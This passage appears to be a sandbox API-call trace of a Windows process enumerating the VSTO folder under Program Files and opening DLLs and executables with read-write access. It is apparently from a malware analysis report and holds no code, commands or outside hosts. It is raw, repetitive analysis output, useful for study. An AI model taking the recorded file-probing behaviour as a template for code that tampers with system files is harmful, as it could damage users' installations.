dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0087.682] GetLastError () returned 0x5 [0087.683] GetLastError () returned 0x5 [0087.683] SetLastError (dwErrCode=0x5) [0087.683] GetLastError () returned 0x5 [0087.683] SetLastError (dwErrCode=0x5) [0087.683] GetLastError () returned 0x5 [0087.683] SetLastError (dwErrCode=0x5) [0087.683] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e3e8 | out: hHeap=0x20000) returned 1 [0087.683] AreFileApisANSI () returned 1 [0087.683] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53718, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 62 [0087.683] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7c) returned 0x6e3e8 [0087.683] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53718, cbMultiByte=-1, lpWideCharStr=0x6e3e8, cchWideChar=62 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\1033") returned 62 [0087.683] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\1033" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\1033"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0087.683] GetLastError () returned 0x5 [0087.683] GetLastError () returned 0x5 [0087.683] SetLastError (dwErrCode=0x5) [0087.683] GetLastError () returned 0x5 [0087.683] SetLastError (dwErrCode=0x5) [0087.683] GetLastError () returned 0x5 [0087.683] SetLastError (dwErrCode=0x5) [0087.683] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e3e8 | out: hHeap=0x20000) returned 1 [0087.683] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0087.683] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0087.683] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53718 | out: hHeap=0x20000) returned 1 [0087.683] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.683] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.683] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.683] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.683] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e4f8 [0087.684] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ea48 [0087.684] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e4f8 | out: hHeap=0x20000) returned 1 [0087.684] FindNextFileW (in: hFindFile=0x784d0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5dbd6700, ftCreationTime.dwHighDateTime=0x1d0d7c4, ftLastAccessTime.dwLowDateTime=0x4ae972f5, ftLastAccessTime.dwHighDateTime=0x1d327e9, ftLastWriteTime.dwLowDateTime=0x5dbd6700, ftLastWriteTime.dwHighDateTime=0x1d0d7c4, nFileSizeHigh=0x0, nFileSizeLow=0x18888, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="VSTOInstaller.exe", cAlternateFileName="VSTOIN~1.EXE")) returned 1 [0087.684] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0087.684] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0087.684] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0087.684] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0087.684] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dee0 [0087.684] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0087.684] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dee0 | out: hHeap=0x20000) returned 1 [0087.684] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0087.684] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0087.684] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0087.684] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0087.684] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0087.684] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0087.684] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6eb58 [0087.684] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e030 [0087.684] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x78150 [0087.687] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4a6d7a0a, ftCreationTime.dwHighDateTime=0x1d327e9, ftLastAccessTime.dwLowDateTime=0x4a6fdac8, ftLastAccessTime.dwHighDateTime=0x1d327e9, ftLastWriteTime.dwLowDateTime=0x4a6fdac8, ftLastWriteTime.dwHighDateTime=0x1d327e9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0087.687] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5dbd6700, ftCreationTime.dwHighDateTime=0x1d0d7c4, ftLastAccessTime.dwLowDateTime=0x4a6d7a0a, ftLastAccessTime.dwHighDateTime=0x1d327e9, ftLastWriteTime.dwLowDateTime=0x5dbd6700, ftLastWriteTime.dwHighDateTime=0x1d0d7c4, nFileSizeHigh=0x0, nFileSizeLow=0x30a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="VSTOInstallerUI.dll", cAlternateFileName="VSTOIN~1.DLL")) returned 1 [0087.687] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e030 | out: hHeap=0x20000) returned 1 [0087.687] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0087.687] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dee0 [0087.687] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0087.687] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0087.687] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0087.687] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0087.687] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0087.687] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0087.687] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dee0 | out: hHeap=0x20000) returned 1 [0087.687] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dee0 [0087.687] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0087.687] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6dfa8 [0087.687] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46048 [0087.687] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0087.687] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0087.687] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0087.687] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0087.687] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0087.688] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d070 [0087.688] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0087.688] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0087.688] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0087.688] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e148 [0087.688] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ebe0 [0087.688] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0087.688] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x55f20 [0087.688] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ebe0 | out: hHeap=0x20000) returned 1 [0087.688] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0087.688] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x81580 [0087.688] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0087.688] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.688] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.688] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.688] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.688] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81580 | out: hHeap=0x20000) returned 1 [0087.688] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e148 | out: hHeap=0x20000) returned 1 [0087.688] AreFileApisANSI () returned 1 [0087.688] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\VSTOInstallerUI.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\VSTOInstallerUI.dll", lpUsedDefaultChar=0x0) returned 82 [0087.688] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71890 [0087.688] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.688] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.688] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfd0 [0087.688] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0087.688] AreFileApisANSI () returned 1 [0087.688] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71890, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 82 [0087.688] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa4) returned 0x5f798 [0087.688] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71890, cbMultiByte=-1, lpWideCharStr=0x5f798, cchWideChar=82 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\VSTOInstallerUI.dll") returned 82 [0087.689] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\VSTOInstallerUI.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\1033\\vstoinstallerui.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x348 [0087.689] GetFileType (hFile=0x348) returned 0x1 [0087.689] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f798 | out: hHeap=0x20000) returned 1 [0087.689] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0087.690] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0087.690] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0087.690] CloseHandle (hObject=0x348) returned 1 [0087.690] AreFileApisANSI () returned 1 [0087.690] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71890, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 82 [0087.690] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa4) returned 0x60088 [0087.690] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71890, cbMultiByte=-1, lpWideCharStr=0x60088, cchWideChar=82 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\VSTOInstallerUI.dll") returned 82 [0087.690] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\VSTOInstallerUI.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\1033\\vstoinstallerui.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x348 [0087.690] GetFileType (hFile=0x348) returned 0x1 [0087.690] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x60088 | out: hHeap=0x20000) returned 1 [0087.691] CloseHandle (hObject=0x348) returned 1 [0087.691] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0087.691] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0087.691] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0087.691] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0087.691] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0087.691] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0087.691] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0087.691] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0087.691] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0087.691] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0087.691] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0087.691] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0087.691] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0087.691] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0087.691] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0087.691] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0087.691] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0087.691] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0087.691] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0087.691] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0087.691] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0087.691] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0087.691] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0087.691] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0087.691] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0087.691] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e308 [0087.691] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0087.691] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0087.691] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0087.691] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e308 | out: hHeap=0x20000) returned 1 [0087.691] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0087.692] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0087.692] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0087.692] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0087.692] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e148 [0087.692] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0087.692] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e148 | out: hHeap=0x20000) returned 1 [0087.692] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0087.692] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0087.692] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dd90 [0087.692] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0087.692] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0087.692] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dd90 | out: hHeap=0x20000) returned 1 [0087.692] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0087.692] AreFileApisANSI () returned 1 [0087.692] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71890, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 82 [0087.692] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa4) returned 0x5f848 [0087.692] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71890, cbMultiByte=-1, lpWideCharStr=0x5f848, cchWideChar=82 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\VSTOInstallerUI.dll") returned 82 [0087.692] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\VSTOInstallerUI.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\1033\\vstoinstallerui.dll"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5dbd6700, ftCreationTime.dwHighDateTime=0x1d0d7c4, ftLastAccessTime.dwLowDateTime=0x4a6d7a0a, ftLastAccessTime.dwHighDateTime=0x1d327e9, ftLastWriteTime.dwLowDateTime=0x5dbd6700, ftLastWriteTime.dwHighDateTime=0x1d0d7c4, nFileSizeHigh=0x0, nFileSizeLow=0x30a0)) returned 1 [0087.692] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f848 | out: hHeap=0x20000) returned 1 [0087.692] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0087.692] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0087.692] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71890 | out: hHeap=0x20000) returned 1 [0087.692] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.692] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.692] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5dbd6700, ftCreationTime.dwHighDateTime=0x1d0d7c4, ftLastAccessTime.dwLowDateTime=0x4a6fdac8, ftLastAccessTime.dwHighDateTime=0x1d327e9, ftLastWriteTime.dwLowDateTime=0x5dbd6700, ftLastWriteTime.dwHighDateTime=0x1d0d7c4, nFileSizeHigh=0x0, nFileSizeLow=0x5080, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="VSTOLoaderUI.dll", cAlternateFileName="VSTOLO~1.DLL")) returned 1 [0087.692] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0087.692] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0087.692] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0087.692] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e110 [0087.692] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0087.692] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0087.692] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0087.693] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e110 | out: hHeap=0x20000) returned 1 [0087.693] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0087.693] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0087.693] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0087.693] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0087.693] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0087.693] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0087.693] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d070 [0087.693] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0087.693] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0087.693] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0087.693] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0087.693] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ec68 [0087.693] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0087.693] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x55f20 [0087.693] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ec68 | out: hHeap=0x20000) returned 1 [0087.693] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0087.693] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8d370 [0087.693] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0087.693] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.693] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.693] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.693] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.693] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d370 | out: hHeap=0x20000) returned 1 [0087.693] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0087.693] AreFileApisANSI () returned 1 [0087.693] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\VSTOLoaderUI.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\VSTOLoaderUI.dll", lpUsedDefaultChar=0x0) returned 79 [0087.693] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cce8 [0087.693] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, 